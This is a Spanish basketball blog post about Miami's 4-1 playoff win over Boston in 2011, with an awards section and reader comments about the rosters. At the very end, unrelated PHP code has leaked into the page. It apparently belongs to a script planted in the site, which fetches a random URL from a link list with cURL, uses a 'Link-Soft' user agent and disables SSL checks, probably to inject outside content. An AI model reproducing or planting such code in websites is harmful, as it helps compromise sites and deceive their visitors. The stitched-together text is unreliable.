Segunda Ronda del Este: Heat 4 – Celtics 1

13 de May de 2011 por TheDeerHunter

Con la caída de los Celtics se escenifica ese cambio de régimen que se ha señalado. Los dos últimos finalistas están fuera, los dos últimos campeones… De hecho son precisamente los Heat los únicos campeones vivos de la última década, con una plantilla que no tiene demasiado que ver con aquella que logró el máximo hito de la franquicia.

Al contrario que Lakers, sus “enemigos íntimos” abandonan la competición con la cabeza alta, con la sensación de que se ha puesto toda la carne en el asador. Han tenido que ser derrotados antes de doblegarse, ante la propia dificultad de un rival muy potente y los contratiempos acontecidos. Por desgracia para ellos también dejan un poso de fin de ciclo más pesimista que en el caso de los amarillos.

Hasta los últimos dos minutos del 5º partido los verdes no han bajado los brazos. El 4-1 no representa en absoluto lo duros que han vuelto a resultar los hombres del trébol y la igualdad con la que se ha resuelto todo. Está escrito que muchos de nosotros confiábamos en ellos para parar ese modelo hostil que nos resulta ahora todo lo que rodea a LeBron. Esa ya clásica terrible defensa instaurada por Doc Rivers siempre se mostró inexpugnable para El Elegido. Resulta irónico que ahora que ya no lo es la supere porque “The Chose One”, como el propio nombre indica, no puede, por definición, estar escoltado por 2 cracks como Wade y Bosh. El nuevo Big Three ha asesinado a sus padres ideológicos después que ellos causaran la muerte a la propia figura del Elegido. Zeus también mató a Cronos antes de convertirse en el rey del Olimpo. Así debe ser.

La guerra se ha librado entre las respectivas “Tríadas”. Los dos factores que hubieran podido cambiarlo todo eran Rondo y Shaq. Confiar en la vuelta del pívot para girar esta tortilla parecía bastante quimérico pero Rajon Rondo era la gran esperanza verde y no ha podido desequilibrar nada. Sólo el gesto heróico en el tercer partido pudo valer para evitar la escoba. Con todos los problemas físicos presentes no podemos reprochar nada, pero resulta un contratiempo vital que Rondo no pueda imponerse a Bibby o a Chalmers.

Tampoco una supuesta plantilla Celtic mejor armada ha podido arañar ventaja. El impacto de Green, Krstic, Murphy o Wafer ha sido prácticamente nulo, Jermaine ha cumplido y poco más, Big Baby no ha sido en ningún momento el de otras ocasiones… Sólo Delonte ha dado un paso adelante y tampoco muy decisivo. No diremos que Perkins y Robinson hubieran cambiado este hecho. Sin embargo, visto lo visto, ellos, junto a Tony Allen… quién sabe. Por el otro bando la, a priori plantilla cogida por hilos con la que contaba Spoelstra, ha cumplido puntualmente bien o muy bien. Sin contar con Haslem, Miller, Ilgauskas, House o Bibby que a priori deberían haber sido sus mejores piezas, el trabajo de Joel Anthony, Chalmers, James Johnson e incluso de un viejo rockero como Juwan Howard han logrado igualar e incluso superar la producción de la intendencia rival.

Con estos mimbres  todo se ha resuelto en un Wade-James-Bosh frente a Allen-Pierce-Garnett y, por mucho talento y “Green Pride” que han desplegado unos, la potencia y juventud de los otros ha marcado la diferencia. Eso sí lo podíamos esperar. La ley natural.

PREMIOS

MVP: Lo primero que viene a la cabeza es la venganza definitiva de LeBron. Sin embargo la inmensa diferencia entre las derrotas de los Heat en la regular y la aplastante victoria de ahora ha sido Dwyane Wade. Entonces promedió unos paupérrimos 13 puntos en 4 partidos. Ahora ha superado los 30, más casi 7 rebotes, 5 asistencias y 2 robos. Flash sigue siendo Flash.

Sorpresa: Después del Big Three vienen 3 nombres más modestos en las tablas estadísticas de los Heat. James Jones, Mario Chalmers y Joel Anthony. Que levante la mano quien pensara que iban a cuajar una serie tan digna como esta. Ojito con la importancia de Joel durante ambas eliminatorias.

Decepción: Rajon Rondo está llamado a ser el líder de la reconstrucción de estos Celtics, pero más allá de lo físico se palpa un cierto estancamiento. La aportación de las incorporaciones de última hora no sabemos si es decepcionante pero sí pobrísima.

Esfuezo en vano: Independientemente que Allen ha sufrido contra Wade como nunca, nadie podrá decir de los tres mitos de los Celtics que no se hayan dejado la piel. Se habla de final de ciclo, pero lo mismo se dijo de cierto equipo que está esperando rival en la final del Oeste. Larga vida al Big Three de los Celtics.

Comenta

8 comentarios a esta entrada

  1. ralage dice:
    #1

    Aunque la victoria de los Heat sea totalmente justa , me queda la sensación de que hemos visto casi a los peores Celtics posibles frente a unos Heat a los que les ha salido casi todo (la prórroga del 4º, los triples de LBJ en el 5º…)
    Sin embargo,las cosas son como son, y esta era la última oportunidad real del Big Three original

      Citar

  2. Txusma dice:
    #2

    Y ahora que toca en Boston? Reconstrucción masiva o lenta agonía hasta q acaben los contratos del Big Three? De momento se habla de un interés por Yao Ming. De concretarse parece que la cosa, al menos para la siguiente temporada, va de mantener el nucleo y hacer algunos retoques.
    Por cierto, en caso de reconstrucción yo no veo claro que líder sea Rajon Rondo. De hecho, me gustaría verlo en otro ambiente asumiendo plenamente el liderazgo del equipo. Aquí estaba por detrás de hasta 3 hombres y se aprovechaba del hecho de ser una cuarta espada. Con las carencias que tiene no lo veo como jugador franquicia.

      Citar

  3. Denise dice:
    #3

    Lo acerté el 4-1, se veia venir el repaso que le iban a pegar los Heat. Veo que seguis infravalorando la plantilla de los Heat cuando decis “a priori plantilla cogida por hilos con la que contaba”, pero si tienen un plantillón. Tres cracks ofensivamente, y atrás una batería de hombres bastante extensa en cualquier posición para poder defender a muerte. Lo que me extraña es que Riley no haya largado a Spoelstra para quedarse con el anillo.
    Y los Celtics si son los que necesitan una gran reconstrucción, y no los Lakers, el Big Three está viejo y no da para más, y si a ello le sumas los penosos fichajes, traspasos y posteriores rendimientos de los dos O’Neal, Murphy, Krstic, o Green, da como resultado una eliminación.

      Citar

  4. TheDeerHunter dice:
    #4

    De momento Rivers renovado por 5 años.
    Inmejorable noticia para los verdes.

      Citar

  5. TheDeerHunter dice:
    #5

    Y @Denise… ¿batería de nombres extensa para defender cualquier posición?:
    Bibby, Chalmers, House, Ilgauskas, James Jones… plantillón ¡¡¿¿??!!
    ¬¬b

      Citar

  6. Denise dice:
    #6

    Pues si, en cada posición tienen tres tios o más para defenderla, por ejemplo, solo Lebron él solito ya puede jugar de 1,2,3 o incluso de 4. Y en la pintura no tienen calidad más allá de Bosh pero si un montonazo de tíos para defender a muerte y repartir cera, y eso que han tenido muy mala suerte con las lesiones este año.

      Citar

  7. TheDeerHunter dice:
    #7

    No creo que el tener carnaza de sobras defina una gran plantilla. Cualquier equipo puede desplegar leñadores y la mayoría de un nivel mayor que estos. Es una rotación envejecida o sin talento. Sólo me quedaría con Joel Anthony y está siendo una de las sorpresas de estos playoffs, porque ya me dirás que ha hecho en la regular.

    Ese equipo vive y muere por tres tíos no por una excelsa plantilla que no posee. No les atribuyamos virtudes que de ninguna manera tienen. Cambiarían a todos sus jugadores de rol por los de cualquier equipo de estos playoffs sin pensárselo y harían bien.

      Citar

  8. GreenPride dice:
    #8

    Pues la venganza de LeBron y Wade sobre los verdes se consumó con esta eliminatoria. Eso sí mucho más igualada de lo que dice el 4-1 en favor de los Heat. De los 5 partidos, 3 han sido igualados hasta el final y los 3 se los llevaron los Heat. Las claves para mí han sido varias:
    Lesiones: Shaq no ha sido factor en la serie. Rondo ha jugado lesionado desde el tercer partido no pudiendo jugar los instantes finales del 4º y 5º partidos. Jermaine y Pierce tocados. La veteranía le ha pasado factura a los verdes frente a las piernas jóvenes de los Heat.
    Wade&LeBron Vs Allen&Pierce: A pesar de la clase y los partidos decentes de los 2 verdes, los 2 grandes de los Heat los han superado claramente y han sido decisivos en todas las victorias de su equipo.
    Banquillos: El de los Celtics ha cumplido a duras penas con grandes decepciones como Glen Davis, el verdadero fiasco de la eliminatoria. El de Miami, que era en principio inferior ha sabido igualar y a veces superar al de Boston lo que ha dado ventaja a su equipo.
    ¿Fin de ciclo verde? Pues es difícil de decir con Ainge tomando decisiones. Yo apuesto a una renovación de la plantilla en torno al Big Three+Rondo y un último intento el año que viene antes de que concluyan los contratos de Allen y Garnett. De momento la renovación de Doc es una buena noticia para el año que viene.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>